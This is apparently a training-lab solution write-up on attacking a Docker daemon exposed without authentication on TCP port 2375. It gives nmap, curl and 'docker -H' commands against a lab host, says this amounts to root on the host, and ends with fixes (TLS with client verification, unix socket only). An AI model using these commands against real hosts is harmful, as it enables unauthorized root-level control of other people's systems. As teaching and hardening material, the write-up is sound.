Exploiting docker misconfiguration - Solution
The Docker daemon can listen for Docker Engine API requests on three types of socket: `unix`, `tcp`, and `fd`. To reach the daemon remotely it has to be configured to listen on a `tcp` socket, and with the default settings that socket provides unencrypted and unauthenticated direct access to the daemon. By convention port `2375` is used for unencrypted and port `2376` for TLS-encrypted communication with the daemon.
- Scan ports `2375` and `2376` with nmap from the student VM

```bash
nmap -p 2375,2376 -n 192.168.56.4 -v
```
- We can query the Docker API directly with `curl`; an open port alone proves little, but a JSON image list coming back from an unauthenticated request confirms the daemon is exposed

```bash
curl 192.168.56.4:2375/images/json | jq .
```
- An attacker can abuse this by pointing their own Docker client at the exposed daemon with `-H` and driving the host's Docker runtime as if they were logged in locally

```bash
docker -H tcp://CTFVMIP:2375 ps
docker -H tcp://CTFVMIP:2375 images
```

- Now we have full privilege over the host system :) The daemon runs as root, and anyone who can talk to it can ask it to start containers with whatever host paths and capabilities they choose, so control of the Docker API is equivalent to root on the host.
Fixing this vulnerability
- If the Docker API really has to be reachable over the network, expose it only on port `2376` with TLS enabled and client-certificate verification (`tlsverify`), so that only clients holding a certificate signed by your CA can talk to the daemon; TLS without verification only encrypts the traffic and still lets anyone in.
- Otherwise do not open a `tcp` socket at all: leave the daemon on its default `unix` socket (or `fd` socket activation), which is protected by filesystem permissions, and make sure no firewall rule or cloud security group exposes 2375 or 2376.